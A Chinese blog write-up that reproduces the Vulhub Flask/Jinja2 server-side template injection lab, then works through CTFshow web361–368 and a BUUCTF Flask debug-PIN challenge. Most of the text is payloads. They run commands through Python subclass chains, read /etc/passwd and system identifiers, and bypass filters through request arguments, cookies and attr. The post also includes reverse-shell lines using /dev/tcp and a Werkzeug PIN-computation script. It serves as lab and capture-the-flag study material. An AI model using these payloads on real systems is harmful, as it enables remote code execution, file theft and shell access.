Vulhub Flask SSTI漏洞复现

最新推荐文章于 2024-02-18 18:50:05 发布
最新推荐文章于 2024-02-18 18:50:05 发布
阅读量1.1k 收藏 3
点赞数
分类专栏: Vulhub 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cyhdl666/article/details/115207111
版权

文章目录

环境搭建

  • 首先利用docker搭建好环境 docker-compose up -d
    在这里插入图片描述
  • docker ps查看搭建的端口:8000

漏洞复现

  • 开始复现
  • flask-ssti漏洞以前有总结过 整理的不够好 今天重新整理一下
  • 题目源码
from flask import Flask, request
from jinja2 import Template

app = Flask(__name__)

@app.route("/")
def index():
    name = request.args.get('name', 'guest')

    t = Template("Hello " + name)
    return t.render()

if __name__ == "__main__":
    app.run()
  • 模板是jinja2模板,学习链接jinja2
  • 注入点
  name = request.args.get('name', 'guest')
  t = Template("Hello " + name)
  return t.render()
  • 获取get传的name参数后 进行渲染 造成构造注入的漏洞
  • 判断措施name={{ 'aaa' | upper}}
  • 页面回显 Hello AAA
  • 利用漏洞 这里在前面的文章讲过了
  • 官方漏洞利用
{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eval' in b.keys() %}
      {{ b['eval']('__import__("os").popen("id").read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}
  • 自己整理的 利用官方payload复现成功
    在这里插入图片描述

python3

  • python3 利用open函数去读取文件
#文件读取
{{().__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__builtins__['open']('/etc/passwd').read()}}
  • 或者利用被重载过的函数.__init__后带wrapper表示没有被重载
  • 这里可以用个脚本跑一下 但是做题的时候 有些题目可能被阉割过 所以不能用脚本跑出的数据
num = -1
search = '__builtins__'
for c in ().__class__.__bases__[0].__subclasses__():
    num += 1
    try:
        if search in c.__init__.__globals__.keys():
            print(c, num)
    except:
        pass
  • 脚本跑的结果 数字不能用 但是函数是可以用滴!
    <class ‘_frozen_importlib._ModuleLock’> 80
    <class ‘_frozen_importlib._DummyModuleLock’> 81
    <class ‘_frozen_importlib._ModuleLockManager’> 82
    <class ‘_frozen_importlib.ModuleSpec’> 83
    <class ‘_frozen_importlib_external.FileLoader’> 94
    <class ‘_frozen_importlib_external._NamespacePath’> 95
    <class ‘_frozen_importlib_external._NamespaceLoader’> 96
    <class ‘_frozen_importlib_external.FileFinder’> 98
    <class ‘zipimport.zipimporter’> 105
    <class ‘zipimport._ZipImportResourceReader’> 106
    <class ‘codecs.IncrementalEncoder’> 108
    <class ‘codecs.IncrementalDecoder’> 109
    <class ‘codecs.StreamReaderWriter’> 110
    <class ‘codecs.StreamRecoder’> 111
    <class ‘os._wrap_close’> 134
    <class ‘os._AddedDllDirectory’> 135
    <class ‘_sitebuiltins.Quitter’> 136
    <class ‘_sitebuiltins._Printer’> 137
  • 含有__buitins__就可以利用python的内建函数了
  • 这里给几个payload
{{().__class__.__base__.__subclasses__[137].__init__.__globals__['__builtins__']['eval']('__import__("os").popen("ls").read()')}}
{% for c in ().__class__.__bases__[0].__subclasses__() %}{% if c.__name__=="catch_warnings" %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('id').read()") }}{% endif %}{% endfor %}

python2

  • payload
#读取密码
''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()
#写文件
#写文件
''.__class__.__mro__[2].__subclasses__()[40]('/tmp/evil.txt', 'w').write('evil code')
#OS模块
system
''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].system('ls')
popen
''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('ls').read()
#eval
''.__class__.__mro__[2].__subclasses__()[59].__init__.__globals__['__builtins__']['eval']("__import__('os').popen('id').read()")
#__import__
''.__class__.__mro__[2].__subclasses__()[59].__init__.__globals__['__builtins__']['__import__']('os').popen('id').read()
#反弹shell
''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('bash -i >& /dev/tcp/你的服务器地址/端口 0>&1').read()
().__class__.__bases__[0].__subclasses__()[59].__init__.__getattribute__('func_global'+'s')['linecache'].__dict__['o'+'s'].__dict__['sy'+'stem']('bash -c "bash -i >& /dev/tcp/xxxx/9999 0>&1"')
  • 如果将代码改成这样就不会造成模板注入了。
t = Template("Hello {{n}}")
return t.render(n=name)

CTFSHOW

WEB361

  • payload
{{''.__class__.__base__.__subclasses__()[80].__init__.__globals__['__builtins__']['eval']("__import__('os').popen('ls').read()")}}

WEB362

  • 想用os._wrap_close类但是失败了
  • 不知道过滤了啥
  • WEB361的payload成功命令执行了
  • 看看过滤了啥
name = request.args.get(&#39;name&#39;)
	if name:
		if re.search(r&#34;2|3&#34;,name,re.I):
			return &#39;:(&#39;
  • 这个过滤真的奇妙
  • 顺便看了一下别人的payload
?name={{lipsum.__globals__.__getitem__("os").popen("cat /flag").read()}}
?name={{lipsum.__globals__['os'].popen('ls').read()}}
?name={{x.__init__.__globals__['__builtins__'].eval('__import__("os").popen("cat /flag").read()')}}
  • 第一个payload:
    lipsum是flask框架下的内置函数吧 调用了一下 发现会随机生成文章
    __getitem__是python的魔法函数,指定键后返回值
    第一个payload与第二个payload差别就在于一个是自己指定了键’os’,一个是利用_getitem_()返回值
  • 第三个payload a.__class__也是个类<class ‘jinja2.runtime.Undefined’>

WEB363 过滤"" ‘’

  • fuzz发现过滤了单引号双引号
  • payload
?name={{a.__class__.__init__.__globals__[request.args.a].eval(request.args.b)}}&a=__builtins__&b=__import__('os').popen('cat /flag').read()
  • 源码
from flask import Flask 
from flask import request 
from flask import render_template_string 
import re 
app = Flask(__name__) 
@app.route('/') 
def app_index(): 
    name = request.args.get('name') 
    if name: if re.search(r"\'|\"",name,re.I):
        return ':(' 
    template = ''' {%% block body %%} <div class="center-content error"> <h1>Hello</h1> <h3>%s</h3> </div> {%% endblock %%} ''' % (request.args.get('name')) 
    return render_template_string(template) 
if __name__=="__main__":
    app.run(host='0.0.0.0',port=80)
  • 另外的payload
?name={{lipsum.__globals__.__getitem__(request.args.a).popen(request.args.b).read()}}&a=os&b=cat /flag
?name={{lipsum.__globals__.__getitem__(request.args.a).eval(request.args.b)}}&a=__builtins__&b=__import__('os').popen('cat /flag').read()
?name={{x.__init__.__globals__[request.args.x1].eval(request.args.x2)}}&x1=__builtins__&x2=__import__('os').popen('cat /flag').read()

过滤单引号和双引号可以通过request绕过

WEB364 过滤’’ “” args

  • 和上面题目的差别在过滤了args
  • 将上题的payload中的args改为cookies
  • 然后Hackbar传cookie值
b=__import__('os').popen('cat ../flag').read(); a=__builtins__

WEB365 过滤 “” ‘’ args []

  • payload:
?name={{lipsum.__globals__.__getitem__(request.args.a).popen(request.args.b).read()}}&a=os&b=cat /flag
?name={{lipsum.__globals__.__getitem__(request.args.a).eval(request.args.b)}}&a=__builtins__&b=__import__('os').popen('cat /flag').read()
  • Hackbar传cookie值
b=__import__('os').popen('cat ../flag').read(); a=__builtins__

WEB366

  • 进一步过滤了[],args,_
  • payload:
?name={{(lipsum|attr(request.cookies.c)|attr(request.cookies.d)(request.cookies.a)).popen(request.cookies.b).read()}

 d=__getitem__; a=os; b=cat /flag; c=__globals__
  • 过滤 ‘’ ""可以通过request.args.a绕过
  • 过滤args可以通过request.cookies.a绕过
  • 过滤[]可以通过__getitem__()绕过
  • 过滤_后,__getitem__无法直接调用,用attr绕过

WEB367

  • payload:
?name={{(x|attr(request.cookies.a)|attr(request.cookies.b)|attr(request.cookies.c))(request.cookies.d).eval(request.cookies.e)}}
  • cookies
a=__init__;b=__globals__;c=__getitem__;d=__builtins__;e=__import__('os').popen('cat /flag').read()

WEB368

  • 过滤了{{}}用{%%}控制语句代替
  • payload:
{% print((x|attr(request.cookies.a)|attr(request.cookies.b)|attr(request.cookies.c))(request.cookies.d).eval(request.cookies.e))%}

Payload:?name={% print(((lipsum|attr(request.cookies.c))|attr(request.cookies.d)(request.cookies.a)).popen(request.cookies.b).read())%}
带上Cookie:a=os;b=cat /flag;c=__globals__;d=__getitem__
  • cookie
a=__init__;b=__globals__;c=__getitem__;d=__builtins__;e=__import__('os').popen('cat /flag').read()

BUUCTF

[GYCTF2020]FlaskApp

  • 预期解 PIN码
  • 生成PIN码需要知道6个值
  1. flask所登录的用户名。可以通过读取/etc/password知道
  2. modname 一般不变就是flask.app
  3. getattr(app, “name”, app.class.name)。python该值一般为Flask ,值一般不变
  4. flask库下app.py的绝对路径。在报错信息中可以获取此值为
  5. 当前网络的mac地址的十进制数。通过文件/sys/class/net/eth0/address读取,eth0为当前使用的网卡
  6. docker机器id
    对于非docker机每一个机器都会有自已唯一的id,linux的id一般存放在/etc/machine-id或/proc/sys/kernel/random/boot_i,有的系统没有这两个文件。
    对于docker机则读取/proc/self/cgroup,其中第一行的/docker/字符串后面的内容作为机器的id
  • 接下来写怎么获取上面的每个值
  1. payload:
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/etc/passwd','r').read() }}{% endif %}{% endfor %}
  • flaskweb❌1000:1000::/home/flaskweb:/bin/sh 用户名为flaskweb
  1. 值为flask.app
  2. 值为Flask
  3. 报错信息中有 例如输入{{''.\__subclass\__()}}值位/usr/local/lib/python3.7/site-packages/flask/app.py
  4. payload:
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/sys/class/net/eth0/address','r').read() }}{% endif %}{% endfor %}
  • 值为:02:42:ac:10:ad:e6 转十进制:2485377871334
  1. payload
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/proc/self/cgroup','r').read() }}{% endif %}{% endfor %}
  • 值为:0b24cc4505e46d218654edfe0b570bab59967e457aa89fce9fc9b87c78b5c5ac
  • 最后用佬写的exp去跑
import hashlib
from itertools import chain
probably_public_bits = [
    'root'# username
    'flask.app',# modname
    'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))
    '/usr/local/lib/python3.7/site-packages/flask/app.py' # getattr(mod, '__file__', None),
]

private_bits = [
    '2485377871334',# str(uuid.getnode()),  /sys/class/net/ens33/address
    '0b24cc4505e46d218654edfe0b570bab59967e457aa89fce9fc9b87c78b5c5ac'# get_machine_id(), /etc/machine-id
]

h = hashlib.md5()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv =None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num

print(rv)
  • 我的PIN码值是:168-621-872
  • 在页面输入{{’’._subclass_}}造成报错后 在报错页面输入PIN码就可以进入debug模式
    在这里插入图片描述
海上清辉
关注
专栏目录
Flask服务端模板(Jinja2)注入漏洞SSTI复现
afei001
12-29 178
目录 1.漏洞概述 2.影响范围 3.漏洞等级 4.漏洞复现 (1)环境搭建 (2)漏洞利用 5.漏洞原理 (1)分析payload (2)分析源码 6.修复建议 1.漏洞概述 服务器模板注入(SSTI)是一种利用公共 Web框架的服务器端模板作为攻击媒介的攻击方式,该攻击利用了嵌入模板的用户输入方式的弱点。SSTI攻击可以利用拼接恶意用户输入导致各种漏洞。通过模板,Web应用可以把输入转换成特定的HTML文件或者email格式。 2.影响范围 ...
框架漏洞-CVE复现-Node.JS+Jquery+Django+Flask
xiaoheizi的博客
07-18 880
Django采用了MTV的框架模式,即模型M,视图V和模版T,使用Django,程序员可以方便、快捷地创建高品质、易维护、数据库驱动的应用程序。访问:/admin/vuln/collection/?描述:Node.js-systeminformation是用于获取各种信息的Node.js模块,在存在命令注入漏洞的版本中,攻击者可以通过未过滤的参数注入payload执行系统命令。添加请求路径:/static/../../../a/../../../../etc/passwd 成功获取敏感信息。
vulhub学习(3) flask-ssti 漏洞复现
yukinorong的博客
06-24 2271
环境准备 漏洞环境选择vulhub , 如上述配置 进入flask/ssti 打开docker环境 这里可以看见环境启动成功 由于我的vulhub配置在虚拟机上,不能直接用127访问。 打开命令行 ifconfig,找到ip 192.x docker 启动环境会另外配置端口,利用docker ps查询。发现是8000 漏洞原理 利用浏览器访问可以看见页面 查看源码 可以看到核心语句为 t = Template("hello " + name) 此处,函数利用get获取参数进入template
Flask(Jinja2) 服务端模板注入漏洞
浅笑996的博客
12-11 1377
原理 参考文章: https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf http://rickgray.me/use-python-features-to-execute-arbitrary-codes-i...
Flask服务端模板(Jinja2)注入漏洞(SSTI)复现
又菜又爱倒腾的博客
10-29 1392
#Flask服务端模板(Jinja2)注入漏洞(SSTI)复现# 一、漏洞简介 服务器模板注入(SSTI)是一种利用公共 Web框架的服务器端模板作为攻击媒介的攻击方式,该攻击利用了嵌入模板的用户输入方式的弱点。SSTI攻击可以利用拼接恶意用户输入导致各种漏洞。通过模板,Web应用可以把输入转换成特定的HTML文件或者email格式。 二、漏洞影响 影响版本 使用Flask框架开发并且使用Jinja2模板引擎,最重要的是模板内容可控。满足该条件的Flask模块中几乎都存在注入漏洞。 三、产生原因 from
Flask (Jinja2) 服务端模板注入漏洞复现
来日可期的博客
10-15 1166
在模板引擎中,开发者可以使用特定的语法将数据与模板结合生成最终的输出。然而,如果在这个过程中,直接使用用户提供的数据而没有进行适当的过滤或转义,攻击者就可以注入恶意模板代码。攻击者可以构造恶意的输入,在用户输入中包含模板标记(如 `{{}}`),以控制模板引擎的行为。模板引擎会将用户提供的数据作为代码来执行,导致恶意代码执行在服务端上下文中
vulhub漏洞复现十五_flask
weixin_44193247的博客
01-26 1338
vulhub漏洞复现练习篇
vulhubflask
haoaaao的博客
05-02 199
0x00 ssti 1、简介 Flask是一个使用 Python 编写的轻量级 Web 应用框架。其 WSGI 工具箱采用 Werkzeug ,模板引擎则使用 Jinja2 。 其中采用jinja2模板引擎传递参数,在书写不规范的时候会发生jinja模板语法的注入命令执行 2、搭建 3、复现 访问http://your-ip/?name={{233*233}},得到54289,说明SSTI漏洞存在。 获取eval函数并执行任意python代码的...
Flask(Jinja2) 服务端模板注入漏洞复现
玄道的网安博客
01-17 712
简介 Flask 是一个使用 Python 编写的轻量级 Web 应用框架。其 WSGI 工具箱采用 Werkzeug ,模板引擎则使用 Jinja2 。 漏洞概述 其中采用jinja2模板引擎传递参数,在书写不规范的时候会发生jinja模板语法的注入命令执行 环境搭建 这里使用vulhub进行搭建 地址: https://github.com/vulhub/vulhub/tree/master/flask/ssti 进入目录并编译运行测试环境 cd vu...
Flask(Jinja2)服务端模板注入漏洞——vulhub/flack/ssti
Stephen Wolf
10-31 1569
一、服务端模板注入漏洞 简述: 服务器模板注入 (SSTI ) 是一种利用公共 Web 框架的服务器端模板作为攻击媒介的攻击方式,该攻击利用了嵌入模板的用户输入方式的弱点。SSTI 攻击可以用来找出 Web 应用程序的内容结构。 二、利用搭的vulhub靶机漏洞复现 1、service docker start //进入虚拟机后开启docker服...
Flask(Jinja2)服务端模板注入 漏洞复现
Senimo
05-03 2069
Flask(Jinja2) 服务端模板注入漏洞一、漏洞描述二、漏洞影响三、漏洞复现1、环境搭建2、漏洞复现四、漏洞POC五、参考链接六、利用工具 一、漏洞描述 模版引擎被 Web 应用程序广泛用于呈现动态数据。不安全的模版语法可以嵌入用户输入实现服务器端的模版注入,这是一个经常出现的严重漏洞。模版注入可以直接攻击 Web 服务器内部结构,并获取到远程代码执行权限(RCE)。 二、漏洞影响 三、漏洞复现 1、环境搭建 使用 Vulhub 在服务器上搭建: cd /vulhub/flask/ssti docke
SSTI模板注入漏洞(vulhub 复现)
最新发布
weixin_74790320的博客
02-18 1535
模板引擎(这里特指用于Web开发的模板引擎)是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,,模板引擎会提供一套生成html代码的程序,,然后生成模板+用户数据的前端html页面,然后反馈给浏览器,呈现在用户面前。模板引擎也会提供沙,但是可以用简而言之我的理解是模板引擎的关键就是只需要用户提供数据给模板便可以生成前端html页面,模板引擎有一定的防范机制,但是可以利用一定技术去绕过破解。
框架安全-CVE 漏洞复现&Django&Flask&Node.js&JQuery框架漏洞复现
rumil的博客
10-29 2378
中间件及框架列表:IIS,Apache,Nginx,Tomcat,Docker,K8s,Weblogic,JBoos,WebSphere,Jenkins ,GlassFish,Jetty,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp,Spring,Flask,jQuery 等1、开发框架-PHP-Laravel-Thinkphp2、开发框架-Javaweb-St2-Spring3、开发框架-Python-django-Flask
flask SSTI漏洞
jiet07的博客
08-07 4555
文章目录第一章flask ssti漏洞的代码(长什么样子)第二章 前言(基础知识储备)第三章 服务器端模板(SST)第四章 服务器模板注入(SSTI)第五章 例子(CTF)第五章 如何防御服务器模板注入参考资料附录 第一章flask ssti漏洞的代码(长什么样子) 1.1 代码 from flask import Flask from flask import request from flask import render_template_string from flask import render
Flask框架-SSTI模板注入漏洞
soldi_er的博客
04-30 1737
文章目录使用Flask搭建网站模板渲染flask有2个渲染方法测试代码1测试代码2存在漏洞的代码,测试代码3利用模板注入漏洞环境准备魔术方法和模块利用漏洞Payload测试和收录参考 使用Flask搭建网站   1、本地环境: 环境 版本 编辑器 Pycharm/2019.3.3 开发语言 Python/3.7.6 框架 Flask/1.1.1 渲染 Jinja2/2.11.1 Response指纹 Server: Werkzeug/1.0.0 Python/3.7.6
SSTI模块注入】SSTI+Flask+Python(中):漏洞利用
07-25 982
SSTI漏洞利用
python-flask-ssti(模版注入漏洞)
diecai2192的博客
03-05 1234
SSTI(Server-Side Template Injection) 服务端模板注入 ,就是服务器模板中拼接了恶意用户输入导致各种漏洞。通过模板,Web应用可以把输入转换成特定的HTML文件或者email格式 输出无过滤就注定会存在xss,当然还有更多深层次的漏洞。 前置知识 1.运行一个一个最小的 Flask 应用 from flask import Flask app = ...
利用Vulnhub复现漏洞 - Flask(Jinja2) 服务端模板注入漏洞
JiangBuLiu的博客
07-08 1144
Flask(Jinja2) 服务端模板注入漏洞Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现 Vulnhub官方复现教程 https://vulhub.org/#/environments/flask/ssti/ 漏洞原理 https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-In...
Flask SSTI漏洞介绍及利用
JCPS_Y的博客
10-23 2786
Flask SSTI漏洞介绍及利用
vulhub靶场教程 flask/ssti
12-09
vulhub靶场是一个专注于网络安全渗透测试和漏洞利用的平台,其中可以通过各种漏洞学习到不同的攻击技术。这次我们来讨论vulhub靶场中的一个特定教程:flask/ssti。 在flask/ssti教程中,我们将学习到的是Flask应用程序中的服务器端模板注入(Server-side Template Injection, SSTI漏洞。这种漏洞的出现是由于Flask应用程序在渲染服务器端模板时没有适当的过滤和限制用户输入的内容,导致恶意用户可以在模板中执行任意的代码。这种漏洞的潜在风险非常高,攻击者可以利用它们执行代码,获取敏感信息甚至在服务器上执行任意命令。 在vulhub靶场中,我们将通过一个具体的示例来演示flask/ssti漏洞的利用。首先,我们需要安装所需的环境,包括Docker和Python;接下来,我们将根据教程提供的源代码和构建脚本,构建和启动一个漏洞应用程序;然后,我们将尝试在应用程序的输入框中输入一些特定代码,以执行任意的命令或获取敏感信息。 通过这个教程,我们可以了解到服务器端模板注入漏洞的原理和危害,并且学习到如何通过构造恶意输入来利用这种漏洞。同时,了解到安全开发中对用户输入的过滤和限制的重要性,以及如何防止和修复这种漏洞。 总之,vulhub靶场中的flask/ssti教程为我们提供了一个实践学习服务器端模板注入漏洞的机会,通过理论和实践相结合的方式,帮助我们更好地了解和掌握网络安全领域中的渗透测试和漏洞利用技术。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值